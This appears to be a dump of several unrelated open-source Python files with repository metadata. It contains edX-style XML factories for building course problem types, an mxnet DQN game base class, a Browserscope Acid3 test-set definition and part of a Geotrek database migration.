responseparam_element = etree.SubElement(response_element, 'responseparam')
responseparam_element.set('type', 'tolerance')
responseparam_element.set('default', str(tolerance))
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
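# Usage sketch (illustrative only): building a complete numerical-response
# problem through the factory defined above. The question text, answer and
# tolerance values are made up for demonstration.
def _example_numerical_problem_xml():
    """Return problem XML for a simple numerical response (assumed usage)."""
    factory = NumericalResponseXMLFactory()
    return factory.build_xml(
        question_text='What is 2 + 3?',
        answer='5',
        tolerance='0.01',
        math_display=True,
    )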
class CustomResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <customresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <customresponse> XML element.
Uses **kwargs:
*cfn*: the Python code to run. Can be inline code,
or the name of a function defined in earlier <script> tags.
Should have the form: cfn(expect, answer_given, student_answers)
where expect is a value (see below),
answer_given is a single value (for 1 input)
or a list of values (for multiple inputs),
and student_answers is a dict of answers by input ID.
*expect*: The value passed to the function cfn
*answer*: Inline script that calculates the answer
"""
# Retrieve **kwargs
cfn = kwargs.get('cfn', None)
expect = kwargs.get('expect', None)
answer = kwargs.get('answer', None)
options = kwargs.get('options', None)
cfn_extra_args = kwargs.get('cfn_extra_args', None)
# Create the response element
response_element = etree.Element("customresponse")
if cfn:
response_element.set('cfn', str(cfn))
if expect:
response_element.set('expect', str(expect))
if answer:
answer_element = etree.SubElement(response_element, "answer")
answer_element.text = str(answer)
if options:
response_element.set('options', str(options))
if cfn_extra_args:
response_element.set('cfn_extra_args', str(cfn_extra_args))
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
class SymbolicResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <symbolicresponse> XML trees """
def create_response_element(self, **kwargs):
cfn = kwargs.get('cfn', None)
answer = kwargs.get('answer', None)
options = kwargs.get('options', None)
response_element = etree.Element("symbolicresponse")
if cfn:
response_element.set('cfn', str(cfn))
if answer:
response_element.set('answer', str(answer))
if options:
response_element.set('options', str(options))
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
class SchematicResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <schematicresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create the <schematicresponse> XML element.
Uses *kwargs*:
*answer*: The Python script used to evaluate the answer.
"""
answer_script = kwargs.get('answer', None)
# Create the <schematicresponse> element
response_element = etree.Element("schematicresponse")
# Insert the <answer> script if one is provided
if answer_script:
answer_element = etree.SubElement(response_element, "answer")
answer_element.set("type", "loncapa/python")
answer_element.text = str(answer_script)
return response_element
def create_input_element(self, **kwargs):
""" Create the <schematic> XML element.
Although <schematic> can have several attributes,
(*height*, *width*, *parts*, *analyses*, *submit_analysis*, and *initial_value*),
none of them are used in the capa module.
For testing, we create a bare-bones version of <schematic>."""
return etree.Element("schematic")
class CodeResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <coderesponse> XML trees """
def build_xml(self, **kwargs):
# Since we are providing an <answer> tag,
# we should override the default behavior
# of including a <solution> tag as well
kwargs['explanation_text'] = None
return super(CodeResponseXMLFactory, self).build_xml(**kwargs)
def create_response_element(self, **kwargs):
"""
Create a <coderesponse> XML element.
Uses **kwargs:
*initial_display*: The code that initially appears in the textbox
[DEFAULT: "Enter code here"]
*answer_display*: The answer to display to the student
[DEFAULT: "This is the correct answer!"]
*grader_payload*: A JSON-encoded string sent to the grader
[DEFAULT: empty dict string]
*allowed_files*: A space-separated string of file names.
[DEFAULT: None]
*required_files*: A space-separated string of file names.
[DEFAULT: None]
"""
# Get **kwargs
initial_display = kwargs.get("initial_display", "Enter code here")
answer_display = kwargs.get("answer_display", "This is the correct answer!")
grader_payload = kwargs.get("grader_payload", '{}')
allowed_files = kwargs.get("allowed_files", None)
required_files = kwargs.get("required_files", None)
# Create the <coderesponse> element
response_element = etree.Element("coderesponse")
# If files are involved, create the <filesubmission> element.
has_files = allowed_files or required_files
if has_files:
filesubmission_element = etree.SubElement(response_element, "filesubmission")
if allowed_files:
filesubmission_element.set("allowed_files", allowed_files)
if required_files:
filesubmission_element.set("required_files", required_files)
# Create the <codeparam> element.
codeparam_element = etree.SubElement(response_element, "codeparam")
# Set the initial display text
initial_element = etree.SubElement(codeparam_element, "initial_display")
initial_element.text = str(initial_display)
# Set the answer display text
answer_element = etree.SubElement(codeparam_element, "answer_display")
answer_element.text = str(answer_display)
# Set the grader payload string
grader_element = etree.SubElement(codeparam_element, "grader_payload")
grader_element.text = str(grader_payload)
# Create the input within the response
if not has_files:
input_element = etree.SubElement(response_element, "textbox")
input_element.set("mode", "python")
return response_element
def create_input_element(self, **kwargs):
# Since we create this in create_response_element(),
# return None here
return None
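# Usage sketch (illustrative only): a code-response problem with a JSON grader
# payload, built through the factory defined above. The payload contents and
# display strings are hypothetical.
def _example_code_problem_xml():
    """Return problem XML for a simple code response (assumed usage)."""
    factory = CodeResponseXMLFactory()
    return factory.build_xml(
        initial_display='# Enter your solution here',
        answer_display='print "solution"',
        grader_payload='{"grader": "hypothetical_grader.py"}',
    )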
class ChoiceResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <choiceresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <choiceresponse> element """
return etree.Element("choiceresponse")
def create_input_element(self, **kwargs):
""" Create a <checkboxgroup> element."""
return ResponseXMLFactory.choicegroup_input_xml(**kwargs)
class FormulaResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <formularesponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <formularesponse> element.
*sample_dict*: A dictionary of the form:
{ VARIABLE_NAME: (MIN, MAX), ....}
This specifies the range within which
to numerically sample each variable to check
student answers.
[REQUIRED]
*num_samples*: The number of times to sample the student's answer
to numerically compare it to the correct answer.
*tolerance*: The tolerance within which answers will be accepted
[DEFAULT: 0.01]
*answer*: The answer to the problem. Can be a formula string
or a Python variable defined in a script
(e.g. "$calculated_answer" for a Python variable
called calculated_answer)
[REQUIRED]
*hints*: List of (hint_prompt, hint_name, hint_text) tuples
Where *hint_prompt* is the formula for which we show the hint,
*hint_name* is an internal identifier for the hint,
and *hint_text* is the text we show for the hint.
"""
# Retrieve kwargs
sample_dict = kwargs.get("sample_dict", None)
num_samples = kwargs.get("num_samples", None)
tolerance = kwargs.get("tolerance", 0.01)
answer = kwargs.get("answer", None)
hint_list = kwargs.get("hints", None)
assert(answer)
assert(sample_dict and num_samples)
# Create the <formularesponse> element
response_element = etree.Element("formularesponse")
# Set the sample information
sample_str = self._sample_str(sample_dict, num_samples, tolerance)
response_element.set("samples", sample_str)
# Set the tolerance
responseparam_element = etree.SubElement(response_element, "responseparam")
responseparam_element.set("type", "tolerance")
responseparam_element.set("default", str(tolerance))
# Set the answer
response_element.set("answer", str(answer))
# Include hints, if specified
if hint_list:
hintgroup_element = etree.SubElement(response_element, "hintgroup")
for (hint_prompt, hint_name, hint_text) in hint_list:
# For each hint, create a <formulahint> element
formulahint_element = etree.SubElement(hintgroup_element, "formulahint")
# We could sample a different range, but for simplicity,
# we use the same sample string for the hints
# that we used previously.
formulahint_element.set("samples", sample_str)
formulahint_element.set("answer", str(hint_prompt))
formulahint_element.set("name", str(hint_name))
# For each hint, create a <hintpart> element
# corresponding to the <formulahint>
hintpart_element = etree.SubElement(hintgroup_element, "hintpart")
hintpart_element.set("on", str(hint_name))
text_element = etree.SubElement(hintpart_element, "text")
text_element.text = str(hint_text)
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
def _sample_str(self, sample_dict, num_samples, tolerance):
# Loncapa uses a special format for sample strings:
# "x,y,z@4,5,3:10,12,8#4" means plug in values for (x,y,z)
# from within the box defined by points (4,5,3) and (10,12,8)
# The "#4" means to repeat 4 times.
variables = [str(v) for v in sample_dict.keys()]
low_range_vals = [str(f[0]) for f in sample_dict.values()]
high_range_vals = [str(f[1]) for f in sample_dict.values()]
        sample_str = (",".join(variables) + "@" +
",".join(low_range_vals) + ":" +
",".join(high_range_vals) +
"#" + str(num_samples))
return sample_str
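# Worked example (illustrative only) of the loncapa sample string produced by
# _sample_str above: {'x': (1, 10), 'y': (2, 20)} with 5 samples yields a
# string of the form "x,y@1,2:10,20#5" (variable order follows dict iteration
# order).
def _example_formula_sample_str():
    """Return the sample string for a two-variable formula problem."""
    factory = FormulaResponseXMLFactory()
    return factory._sample_str({'x': (1, 10), 'y': (2, 20)}, 5, 0.01)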
class ImageResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <imageresponse> XML """
def create_response_element(self, **kwargs):
""" Create the <imageresponse> element."""
return etree.Element("imageresponse")
def create_input_element(self, **kwargs):
""" Create the <imageinput> element.
Uses **kwargs:
*src*: URL for the image file [DEFAULT: "/static/image.jpg"]
*width*: Width of the image [DEFAULT: 100]
*height*: Height of the image [DEFAULT: 100]
*rectangle*: String representing the rectangles the user should select.
Take the form "(x1,y1)-(x2,y2)", where the two (x,y)
tuples define the corners of the rectangle.
Can include multiple rectangles separated by a semicolon, e.g.
"(490,11)-(556,98);(242,202)-(296,276)"
*regions*: String representing the regions a user can select
Take the form "[ [[x1,y1], [x2,y2], [x3,y3]],
[[x1,y1], [x2,y2], [x3,y3]] ]"
(Defines two regions, each with 3 points)
REQUIRED: Either *rectangle* or *region* (or both)
"""
# Get the **kwargs
src = kwargs.get("src", "/static/image.jpg")
width = kwargs.get("width", 100)
height = kwargs.get("height", 100)
rectangle = kwargs.get('rectangle', None)
regions = kwargs.get('regions', None)
assert(rectangle or regions)
# Create the <imageinput> element
input_element = etree.Element("imageinput")
input_element.set("src", str(src))
input_element.set("width", str(width))
input_element.set("height", str(height))
if rectangle:
input_element.set("rectangle", rectangle)
if regions:
input_element.set("regions", regions)
return input_element
class JavascriptResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <javascriptresponse> XML """
def create_response_element(self, **kwargs):
""" Create the <javascriptresponse> element.
Uses **kwargs:
*generator_src*: Name of the JS file to generate the problem.
*grader_src*: Name of the JS file to grade the problem.
*display_class*: Name of the class used to display the problem
*display_src*: Name of the JS file used to display the problem
*param_dict*: Dictionary of parameters to pass to the JS
"""
# Get **kwargs
generator_src = kwargs.get("generator_src", None)
grader_src = kwargs.get("grader_src", None)
display_class = kwargs.get("display_class", None)
display_src = kwargs.get("display_src", None)
param_dict = kwargs.get("param_dict", {})
# Both display_src and display_class given,
# or neither given
assert((display_src and display_class) or
(not display_src and not display_class))
# Create the <javascriptresponse> element
response_element = etree.Element("javascriptresponse")
if generator_src:
generator_element = etree.SubElement(response_element, "generator")
generator_element.set("src", str(generator_src))
if grader_src:
grader_element = etree.SubElement(response_element, "grader")
grader_element.set("src", str(grader_src))
if display_class and display_src:
display_element = etree.SubElement(response_element, "display")
display_element.set("class", str(display_class))
display_element.set("src", str(display_src))
for (param_name, param_val) in param_dict.items():
responseparam_element = etree.SubElement(response_element, "responseparam")
responseparam_element.set("name", str(param_name))
responseparam_element.set("value", str(param_val))
return response_element
def create_input_element(self, **kwargs):
""" Create the <javascriptinput> element """
return etree.Element("javascriptinput")
class MultipleChoiceResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <multiplechoiceresponse> XML """
def create_response_element(self, **kwargs):
""" Create the <multiplechoiceresponse> element"""
return etree.Element('multiplechoiceresponse')
def create_input_element(self, **kwargs):
""" Create the <choicegroup> element"""
kwargs['choice_type'] = 'multiple'
return ResponseXMLFactory.choicegroup_input_xml(**kwargs)
class TrueFalseResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <truefalseresponse> XML """
def create_response_element(self, **kwargs):
""" Create the <truefalseresponse> element"""
return etree.Element('truefalseresponse')
def create_input_element(self, **kwargs):
""" Create the <choicegroup> element"""
kwargs['choice_type'] = 'multiple'
return ResponseXMLFactory.choicegroup_input_xml(**kwargs)
class OptionResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <optionresponse> XML"""
def create_response_element(self, **kwargs):
""" Create the <optionresponse> element"""
return etree.Element("optionresponse")
def create_input_element(self, **kwargs):
""" Create the <optioninput> element.
Uses **kwargs:
*options*: a list of possible options the user can choose from [REQUIRED]
You must specify at least 2 options.
*correct_option*: the correct choice from the list of options [REQUIRED]
"""
options_list = kwargs.get('options', None)
correct_option = kwargs.get('correct_option', None)
assert(options_list and correct_option)
assert(len(options_list) > 1)
assert(correct_option in options_list)
# Create the <optioninput> element
optioninput_element = etree.Element("optioninput")
# Set the "options" attribute
# Format: "('first', 'second', 'third')"
options_attr_string = u",".join([u"'{}'".format(o) for o in options_list])
options_attr_string = u"({})".format(options_attr_string)
optioninput_element.set('options', options_attr_string)
# Set the "correct" attribute
optioninput_element.set('correct', str(correct_option))
return optioninput_element
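# Usage sketch (illustrative only): an <optioninput> element with three options
# where 'banana' is marked correct, matching the format documented in
# create_input_element above. The option strings are made up.
def _example_option_input_element():
    """Return an <optioninput> element (assumed usage)."""
    factory = OptionResponseXMLFactory()
    return factory.create_input_element(
        options=['apple', 'banana', 'cherry'],
        correct_option='banana',
    )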
class StringResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <stringresponse> XML """
def create_response_element(self, **kwargs):
""" Create a <stringresponse> XML element.
Uses **kwargs:
*answer*: The correct answer (a string) [REQUIRED]
*case_sensitive*: Whether the response is case-sensitive (True/False)
[DEFAULT: True]
*hints*: List of (hint_prompt, hint_name, hint_text) tuples
Where *hint_prompt* is the string for which we show the hint,
*hint_name* is an internal identifier for the hint,
and *hint_text* is the text we show for the hint.
*hintfn*: The name of a function in the script to use for hints.
*regexp*: Whether the response is regexp
        *additional_answers*: list of additional answers.
"""
# Retrieve the **kwargs
answer = kwargs.get("answer", None)
case_sensitive = kwargs.get("case_sensitive", None)
hint_list = kwargs.get('hints', None)
hint_fn = kwargs.get('hintfn', None)
regexp = kwargs.get('regexp', None)
additional_answers = kwargs.get('additional_answers', [])
assert answer
# Create the <stringresponse> element
response_element = etree.Element("stringresponse")
# Set the answer attribute
response_element.set("answer", unicode(answer))
# Set the case sensitivity and regexp:
type_value = ''
if case_sensitive is not None:
type_value += "cs" if case_sensitive else "ci"
type_value += ' regexp' if regexp else ''
if type_value:
response_element.set("type", type_value.strip())
# Add the hints if specified
if hint_list or hint_fn:
hintgroup_element = etree.SubElement(response_element, "hintgroup")
if hint_list:
assert not hint_fn
for (hint_prompt, hint_name, hint_text) in hint_list:
stringhint_element = etree.SubElement(hintgroup_element, "stringhint")
stringhint_element.set("answer", str(hint_prompt))
stringhint_element.set("name", str(hint_name))
hintpart_element = etree.SubElement(hintgroup_element, "hintpart")
hintpart_element.set("on", str(hint_name))
hint_text_element = etree.SubElement(hintpart_element, "text")
hint_text_element.text = str(hint_text)
if hint_fn:
assert not hint_list
hintgroup_element.set("hintfn", hint_fn)
for additional_answer in additional_answers:
etree.SubElement(response_element, "additional_answer").text = additional_answer
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
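# Usage sketch (illustrative only): a case-insensitive string response with a
# single hint, using the (hint_prompt, hint_name, hint_text) tuple format
# documented above. The answer and hint strings are made up.
def _example_string_problem_xml():
    """Return problem XML for a string response with one hint (assumed usage)."""
    factory = StringResponseXMLFactory()
    return factory.build_xml(
        answer='Paris',
        case_sensitive=False,
        hints=[('Lyon', 'not_capital', 'Lyon is a city, but not the capital.')],
    )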
class AnnotationResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <annotationresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <annotationresponse> element """
return etree.Element("annotationresponse")
def create_input_element(self, **kwargs):
""" Create a <annotationinput> element."""
input_element = etree.Element("annotationinput")
text_children = [
{'tag': 'title', 'text': kwargs.get('title', 'super cool annotation')},
{'tag': 'text', 'text': kwargs.get('text', 'texty text')},
{'tag': 'comment', 'text':kwargs.get('comment', 'blah blah erudite comment blah blah')},
{'tag': 'comment_prompt', 'text': kwargs.get('comment_prompt', 'type a commentary below')},
{'tag': 'tag_prompt', 'text': kwargs.get('tag_prompt', 'select one tag')}
]
for child in text_children:
etree.SubElement(input_element, child['tag']).text = child['text']
default_options = [('green', 'correct'),('eggs', 'incorrect'), ('ham', 'partially-correct')]
options = kwargs.get('options', default_options)
options_element = etree.SubElement(input_element, 'options')
for (description, correctness) in options:
option_element = etree.SubElement(options_element, 'option', {'choice': correctness})
option_element.text = description
return input_element
class SymbolicResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <symbolicresponse> xml """
def create_response_element(self, **kwargs):
""" Build the <symbolicresponse> XML element.
Uses **kwargs:
*expect*: The correct answer (a sympy string)
*options*: list of option strings to pass to symmath_check
(e.g. 'matrix', 'qbit', 'imaginary', 'numerical')"""
# Retrieve **kwargs
expect = kwargs.get('expect', '')
options = kwargs.get('options', [])
# Symmath check expects a string of options
options_str = ",".join(options)
# Construct the <symbolicresponse> element
response_element = etree.Element('symbolicresponse')
if expect:
response_element.set('expect', str(expect))
if options_str:
response_element.set('options', str(options_str))
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
class ChoiceTextResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <choicetextresponse> xml """
def create_response_element(self, **kwargs):
""" Create a <choicetextresponse> element """
return etree.Element("choicetextresponse")
def create_input_element(self, **kwargs):
""" Create a <checkboxgroup> element.
choices can be specified in the following format:
[("true", [{"answer": "5", "tolerance": 0}]),
("false", [{"answer": "5", "tolerance": 0}])
]
This indicates that the first checkbox/radio is correct and it
contains a numtolerance_input with an answer of 5 and a tolerance of 0
It also indicates that the second has a second incorrect radiobutton
or checkbox with a numtolerance_input.
"""
choices = kwargs.get('choices', [("true", {})])
choice_inputs = []
# Ensure that the first element of choices is an ordered
# collection. It will start as a list, a tuple, or not a Container.
if type(choices[0]) not in [list, tuple]:
choices = [choices]
for choice in choices:
correctness, answers = choice
numtolerance_inputs = []
# If the current `choice` contains any("answer": number)
# elements, turn those into numtolerance_inputs
if answers:
# `answers` will be a list or tuple of answers or a single
# answer, representing the answers for numtolerance_inputs
# inside of this specific choice.
# Make sure that `answers` is an ordered collection for
# convenience.
if type(answers) not in [list, tuple]:
answers = [answers]
numtolerance_inputs = [
self._create_numtolerance_input_element(answer)
for answer in answers
]
choice_inputs.append(
self._create_choice_element(
correctness=correctness,
inputs=numtolerance_inputs
)
)
# Default type is 'radiotextgroup'
input_type = kwargs.get('type', 'radiotextgroup')
input_element = etree.Element(input_type)
for ind, choice in enumerate(choice_inputs):
            # Give each choice text equal to its position (0, 1, 2, ...)
choice.text = "choice_{0}".format(ind)
input_element.append(choice)
return input_element
def _create_choice_element(self, **kwargs):
"""
        Creates a choice element for a choicetextresponse problem.
Defaults to a correct choice with no numtolerance_input
"""
text = kwargs.get('text', '')
correct = kwargs.get('correctness', "true")
inputs = kwargs.get('inputs', [])
choice_element = etree.Element("choice")
choice_element.set("correct", correct)
choice_element.text = text
for inp in inputs:
# Add all of the inputs as children of this choice
choice_element.append(inp)
return choice_element
def _create_numtolerance_input_element(self, params):
"""
Creates a <numtolerance_input/> or <decoy_input/> element with
optionally specified tolerance and answer.
"""
answer = params['answer'] if 'answer' in params else None
# If there is not an answer specified, Then create a <decoy_input/>
# otherwise create a <numtolerance_input/> and set its tolerance
# and answer attributes.
if answer:
text_input = etree.Element("numtolerance_input")
text_input.set('answer', answer)
            # If a tolerance was specified, use it; otherwise
            # set the tolerance to "0".
text_input.set(
'tolerance',
params['tolerance'] if 'tolerance' in params else "0"
)
else:
text_input = etree.Element("decoy_input")
return text_input
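# Usage sketch (illustrative only): a radiotextgroup with one correct choice
# carrying a numtolerance_input and one incorrect choice with no inputs,
# matching the `choices` format documented in create_input_element above.
def _example_choicetext_input_element():
    """Return a <radiotextgroup> element (assumed usage)."""
    factory = ChoiceTextResponseXMLFactory()
    choices = [
        ("true", [{"answer": "5", "tolerance": "0"}]),
        ("false", {}),
    ]
    return factory.create_input_element(choices=choices, type='radiotextgroup')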
| agpl-3.0 |
rahul003/mxnet | example/reinforcement-learning/dqn/game.py | 52 | 1555 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
DEFAULT_MAX_EPISODE_STEP = 1000000
class Game(object):
def __init__(self):
self.total_reward = 0
self.episode_reward = 0
self.episode_step = 0
self.max_episode_step = DEFAULT_MAX_EPISODE_STEP
def start(self):
raise NotImplementedError("Must Implement!")
def begin_episode(self, max_episode_step):
raise NotImplementedError("Must Implement!")
@property
def episode_terminate(self):
raise NotImplementedError
def get_observation(self):
raise NotImplementedError
@property
def state_enabled(self):
raise NotImplementedError
def current_state(self):
return self.replay_memory.latest_slice()
def play(self, a):
raise NotImplementedError
| apache-2.0 |
githubashto/browserscope | categories/acid3/test_set.py | 9 | 2659 | #!/usr/bin/python2.5
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License')
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark Tests Definitions."""
import logging
from categories import test_set_base
_CATEGORY = 'acid3'
class Acid3Test(test_set_base.TestBase):
TESTS_URL_PATH = '/%s/test' % _CATEGORY
def __init__(self, key, name, doc):
"""Initialze a benchmark test.
Args:
key: key for this in dict's
name: a human readable label for display
doc: a description of the test
"""
test_set_base.TestBase.__init__(
self,
key=key,
name=name,
url=self.TESTS_URL_PATH,
doc=doc,
min_value=0,
max_value=100)
_TESTS = (
# key, name, doc
Acid3Test(
'score', 'Score', 'Acid3 test score'
),
)
class Acid3TestSet(test_set_base.TestSet):
def GetTestScoreAndDisplayValue(self, test_key, raw_scores):
"""Get a normalized score (0 to 100) and a value to output to the display.
Args:
test_key: a key for a test_set test.
raw_scores: a dict of raw_scores indexed by key.
Returns:
score, display_value
# score is an integer in 0 to 100.
# display_value is the text for the cell.
"""
raw_score = raw_scores.get(test_key, 0)
if raw_score:
return raw_score, '%s/100' % raw_score
else:
return 0, ''
def GetRowScoreAndDisplayValue(self, results):
"""Get the overall score for this row of results data.
Args:
results: {
'test_key_1': {'score': score_1, 'raw_score': raw_score_1, ...},
'test_key_2': {'score': score_2, 'raw_score': raw_score_2, ...},
...
}
Returns:
score, display_value
# score is from 0 to 100.
# display_value is the text for the cell.
"""
test_key = 'score'
score = results.get(test_key, {}).get('score', None) or 0
return score, ''
TEST_SET = Acid3TestSet(
category=_CATEGORY,
category_name='Acid3',
summary_doc='Tests of dynamic browser capabilities to encourage browser interoperability.',
tests=_TESTS,
test_page='/%s/%s.html' % (_CATEGORY, _CATEGORY)
)
| apache-2.0 |
Anaethelion/Geotrek | geotrek/trekking/migrations/0020_auto__add_field_accessibility_pictogram.py | 3 | 24350 | # -*- coding: utf-8 -*-
from south.db import db
from south.v2 import SchemaMigration
from django.conf import settings
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Accessibility.pictogram'
db.add_column('o_b_accessibilite', 'pictogram',
self.gf('django.db.models.fields.files.FileField')(max_length=512, null=True, db_column='picto'),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Accessibility.pictogram'
db.delete_column('o_b_accessibilite', 'picto')
models = {
u'authent.structure': {
'Meta': {'ordering': "['name']", 'object_name': 'Structure'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
u'common.theme': {
'Meta': {'ordering': "['label']", 'object_name': 'Theme', 'db_table': "'o_b_theme'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'theme'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'core.comfort': {
'Meta': {'ordering': "['comfort']", 'object_name': 'Comfort', 'db_table': "'l_b_confort'"},
'comfort': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_column': "'confort'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"})
},
u'core.datasource': {
'Meta': {'ordering': "['source']", 'object_name': 'Datasource', 'db_table': "'l_b_source'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"})
},
u'core.network': {
'Meta': {'ordering': "['network']", 'object_name': 'Network', 'db_table': "'l_b_reseau'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_column': "'reseau'"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"})
},
u'core.path': {
'Meta': {'object_name': 'Path', 'db_table': "'l_t_troncon'"},
'arrival': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'null': 'True', 'db_column': "'arrivee'", 'blank': 'True'}),
'ascent': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'denivelee_positive'", 'blank': 'True'}),
'comfort': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'paths'", 'null': 'True', 'db_column': "'confort'", 'to': u"orm['core.Comfort']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'db_column': "'remarques'", 'blank': 'True'}),
'datasource': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'paths'", 'null': 'True', 'db_column': "'source'", 'to': u"orm['core.Datasource']"}),
'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_column': "'date_insert'", 'blank': 'True'}),
'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_column': "'date_update'", 'blank': 'True'}),
'departure': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'null': 'True', 'db_column': "'depart'", 'blank': 'True'}),
'descent': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'denivelee_negative'", 'blank': 'True'}),
'geom': ('django.contrib.gis.db.models.fields.LineStringField', [], {'srid': str(settings.SRID), 'spatial_index': 'False'}),
'geom_3d': ('django.contrib.gis.db.models.fields.GeometryField', [], {'default': 'None', 'dim': '3', 'spatial_index': 'False', 'null': 'True', 'srid': str(settings.SRID)}),
'geom_cadastre': ('django.contrib.gis.db.models.fields.LineStringField', [], {'srid': str(settings.SRID), 'null': 'True', 'spatial_index': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'length': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'null': 'True', 'db_column': "'longueur'", 'blank': 'True'}),
'max_elevation': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'altitude_maximum'", 'blank': 'True'}),
'min_elevation': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'altitude_minimum'", 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'db_column': "'nom'", 'blank': 'True'}),
'networks': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'paths'", 'to': u"orm['core.Network']", 'db_table': "'l_r_troncon_reseau'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'slope': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'null': 'True', 'db_column': "'pente'", 'blank': 'True'}),
'stake': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'paths'", 'null': 'True', 'db_column': "'enjeu'", 'to': u"orm['core.Stake']"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"}),
'usages': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'paths'", 'to': u"orm['core.Usage']", 'db_table': "'l_r_troncon_usage'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_column': "'valide'"}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_column': "'visible'"})
},
u'core.pathaggregation': {
'Meta': {'ordering': "['order']", 'object_name': 'PathAggregation', 'db_table': "'e_r_evenement_troncon'"},
'end_position': ('django.db.models.fields.FloatField', [], {'db_column': "'pk_fin'", 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'db_column': "'ordre'", 'blank': 'True'}),
'path': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'aggregations'", 'on_delete': 'models.DO_NOTHING', 'db_column': "'troncon'", 'to': u"orm['core.Path']"}),
'start_position': ('django.db.models.fields.FloatField', [], {'db_column': "'pk_debut'", 'db_index': 'True'}),
